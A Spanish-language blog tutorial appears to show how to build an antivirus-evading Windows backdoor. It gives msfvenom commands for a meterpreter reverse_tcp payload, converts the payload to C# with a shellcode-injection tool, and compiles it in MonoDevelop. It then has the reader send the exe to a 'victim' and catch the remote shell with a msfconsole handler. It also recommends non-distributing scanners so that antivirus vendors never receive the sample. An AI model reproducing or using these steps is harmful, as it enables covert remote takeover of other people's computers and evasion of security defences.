Como HACKEAR WINDOWS 10 indetectable desde KALI LINUX 2016.1

El otro día estaba jugando con un backdoor que era indetectable para todos los antivirus pero como hay personas que escanean el virus antes de usarlo al ataque, en algunos casos personas cometen el error de publicarlo en “VIRUSTOTAL”. Recuerda que es una empresa que reporta virus y lo compra a las compañías de antivirus .

Ahora te voy a dejar dos paginas donde puedes scanearlo y que no sea compartido para esas compañías de antivirus.

Screenshot from 2016-02-26 13-28-33

Aquí puedes encontrar esta pagina se llama https://virusscan.jotti.org

Screenshot from 2016-02-26 13-28-27

Tienes otra compañía que también lo hace. http://nodistribute.com

Este método vamos a combinar windows 7 con Kali Linux 2016.1 como ya saben vamos atacar windows 10.
Porque windows 7? porque vamos a compilar un .bin a .cs en el cual vamos a utilizar una pequeña herramienta que se necesita tener net framework AQUÍ

Primero vamos crear el backdoor en código binario con extensión .bin.

Vamos a nuestra terminal de KALI LINUX 2016.1

 msfvenom -p windows/meterpreter/reverse_tcp lhost=(IP) lport=(PUERTO)4444 -t raw -o /root/Desktop/example.bin

En este caso lo guarde en Escritorio y vamos a usar SimpleHTTPServer para transportar el archivo.

 python -m SimpleHTTPServer 8080

Con la ubicación de la herramienta vamos a transportar el archivo y vamos transformarlo en .cs
vamos a descargar el archivo aquí 

Al Descargar el archivo lo vamos a descomprimir y vamos a usar la herramienta.

Screenshot from 2016-02-26 13-43-32
En mi caso lo tengo en la carpeta de descarga. Ejemplo

cd /user/CreadPag/Download/hanzoInjection-master

Y ejecutamos el .exe desde la terminal aclaro que tienen que colocar el archivo creado example.bin en la misma carpeta donde corre el programa.

 HanzoInjection.exe -p example.bin -o injection_memory.cs

Screenshot from 2016-02-26 13-45-41

Ahora vamos compilar el archivo .cs en Kali Linux pueden seguir en windows usando Visual Studio o seguimos en kali.
Tenemos que descargar un programa llamado MonoDevelop

 apt-get install monodevelop

Lo descargamos para poder compilar el archivo .cs y al terminal nos ofrezca el archivo en .exe
Ahora vamos a abrir el programa

Screenshot from 2016-02-26 12-58-35

Creamos un nuevo proyecto en mi caso vamos a NET- Console Proyect. C#

Borramos el código del proyecto y copiamos el código del archivo .cs

Screenshot from 2016-02-26 13-00-39

Lo vamos a compilar y nos muestra dos enormes errores pero tranquilo vamos a solucionarlo.

Vamos a Proyect- General- al final dice “Allow ‘unsafe’ code” vamos a seleccionarlo.

Screenshot from 2016-02-26 13-00-52

Segundo error para la solución.

Vamos a Referencia editar y vamos al final a buscar “System.Xml” y aceptamos.

Screenshot from 2016-02-26 13-01-47

Ahora el programa va a compilar y nos ha creado una archivo .exe

Screenshot from 2016-02-26 13-57-28
Ahora simplemente vamos a enviar el archivo a la victima de Windows 10 y vamos a la consola de meterpreter.
Como ya sabes el mismo procedimiento.

 msfconsole
 use multi/handler
 set payload windows/meterpreter/reverse_tcp
 set lhost (IP)
set lport (PUERTO) 4444
 exploit

La victima le va a ejecutar el programa y simplemente no le abrirá pero nosotros vamos a capturar todo.

Screenshot from 2016-02-26 14-00-52

Screenshot from 2016-02-26 14-00-43

Como les repito siempre combinando muchos sistemas puedes armar una gran arma y recuerda “VIRUSTOTAL” es tu enemigo en el caso que programes backdoor.
Si te gusto me ayudarías a compartirlo y darte una visitar a mi canal de YOUTUBE